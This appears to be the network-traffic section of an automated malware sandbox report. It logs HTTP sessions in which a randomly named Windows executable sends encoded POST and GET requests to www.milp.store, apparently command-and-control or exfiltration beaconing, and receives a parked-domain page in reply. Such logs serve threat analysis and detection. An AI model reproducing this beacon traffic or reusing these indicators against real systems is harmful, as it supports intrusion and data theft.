                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:13.564450026 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:13.564465046 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:13.564730883 CET1236INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                Dec 13, 2024 11:41:13.564743996 CET878INData Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68
                                                Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.1049957194.9.94.86802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:15.072442055 CET657OUTPOST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 218
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 6c 49 71 4e 6f 54 68 4d 37 58 34 43 79 34 41 6c 6a 59 51 43 54 74 63 4a 32 38 43 67 3d 3d
                                                Data Ascii: 6hzlp=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXdalIqNoThM7X4Cy4AljYQCTtcJ28Cg==
                                                Dec 13, 2024 11:41:16.337105036 CET1236INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:16 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:16.337188005 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:16.337199926 CET1236INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:16.337482929 CET672INData Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e
                                                Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
                                                Dec 13, 2024 11:41:16.337551117 CET1236INData Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09
                                                Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
                                                Dec 13, 2024 11:41:16.337682962 CET206INData Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70
                                                Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.1049964194.9.94.86802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:17.729728937 CET1670OUTPOST /2j93/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Cache-Control: max-age=0
                                                Content-Length: 1230
                                                Connection: close
                                                Host: www.milp.store
                                                Origin: http://www.milp.store
                                                Referer: http://www.milp.store/2j93/
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Data Raw: 36 68 7a 6c 70 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 4a 52 33 5a 55 70 70 56 76 4d 50 4b 46 69 71 75 38 74 7a 70 6a 4f 36 79 66 2f 45 6c 2f 6a 4c 54 4b 68 65 59 58 51 5a 48 68 34 55 77 5a 56 44 66 4b 53 6f 46 35 58 45 79 38 7a 4f 37 47 6c 6f 66 30 4b 41 46 43 71 67 55 69 53 66 79 61 34 52 48 41 77 56 58 57 59 39 46 67 32 2b 32 56 31 59 6c 6b 4c 4a 44 61 6b 37 2f 54 53 63 2f 69 67 55 50 49 51 76 4f 70 67 6b 6b 45 4d 6e 75 32 6c 32 39 36 47 75 6f 65 67 74 5a 61 63 4e 6b 41 32 7a 76 38 44 65 54 58 4b 55 6a 41 43 73 42 36 6a 62 66 48 63 [TRUNCATED]
                                                Data Ascii: 6hzlp=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4MflJR3ZUppVvMPKFiqu8tzpjO6yf/El/jLTKheYXQZHh4UwZVDfKSoF5XEy8zO7Glof0KAFCqgUiSfya4RHAwVXWY9Fg2+2V1YlkLJDak7/TSc/igUPIQvOpgkkEMnu2l296GuoegtZacNkA2zv8DeTXKUjACsB6jbfHckU2GzZdNlSpTRrHm9Sec7IeHTr88SBS6hFxOlGSjFz2JN49B/jt9doRBwNwQhO8JMW5BR1/Nc2jz67g7hPzlRsE/v94ZpC6iZ5CmMg7iYxMVxaEvJEEQXwy2YgG5ycLrvFiLBJKiyTY/puTqqzJ8I/7vV6uA3rfrEGBJxHgxhehGxI7SN1SmfVFG8vEJmiwgd7zX7y/k+nPG22CJdIBV2RIyae7IM3iqIL7oozz73hpM2z5+Xq96kKDm67a5Y9+vekL+kQB49ie4BcSD+rLHUUNXiVpdkMAlfZztV5Ad89BYt/x2YWlddmxoYtkjx10xL5oVnDNREkuT42S1Nc1sc4R5XUCpZeL60flaCb0OGR0R5qCVHbsLnYupCtUWEDrjuljJV9a/t/5vOjR0Zq4ovRjocdDlVnzXiJa6LvbTtS8W5Dplxz7gUBM4hXFfY19zlScZSMANvroEz/J+wr/lfTcbKRtCli+9rajYQqE8AjS7Ged5RH/U9jQ3LPcvhLpMUuFaF9uSbV9HuKGEe5fJfauU7ssCcnuOpIIh7iiuUFCqySSvitly6yJDKwRZhZHScQV4VcxRdO3gshQpnlSHe260hytOq2wYngZk9KCQKkSCIE198GAS+SO1xyZdKPu5Wa4eXY29dwGvVZ9yEWG6kZJD32RPwyNLXu [TRUNCATED]
                                                Dec 13, 2024 11:41:19.144171000 CET1236INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:19.144351006 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:19.144390106 CET448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                Dec 13, 2024 11:41:19.144520044 CET1236INData Raw: 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c 2f 68 32 3e 0a 09 09 09 3c 70 3e 50 72 6f 74 65 63 74 20 79 6f 75 72 20
                                                Data Ascii: ss="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainnames/?utm_medium=sitelink
                                                Dec 13, 2024 11:41:19.144556046 CET1236INData Raw: 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e
                                                Data Ascii: d more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need to get started with you
                                                Dec 13, 2024 11:41:19.144576073 CET430INData Raw: 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67
                                                Data Ascii: ww.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https://www.loopia.com/support?


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.1049970194.9.94.86802592C:\Program Files (x86)\UEACZCNvmbEMahLfhDuruOcQkVbiacqiTaMWaMOunGFzfRFkHXvJkEsQTKCtvjY\lxdvPfMVsD.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 13, 2024 11:41:20.388465881 CET380OUTGET /2j93/?Hn=lLPdJfWx2zHd-riP&6hzlp=Vzef3oWXaGELtgUQK6WziDhXN2l6Tpk3Ax3n2w42PW1Tdv5T/46T0viVyj66+7X9h8HGTeoaGJDhn+MaRcWt633rnN+WFzamPt7emOGov712MsYpmA== HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US
                                                Connection: close
                                                Host: www.milp.store
                                                User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                Dec 13, 2024 11:41:21.662540913 CET1236INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Fri, 13 Dec 2024 10:41:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Powered-By: PHP/8.1.29
                                                Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                Dec 13, 2024 11:41:21.662626982 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                Dec 13, 2024 11:41:21.662663937 CET448INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
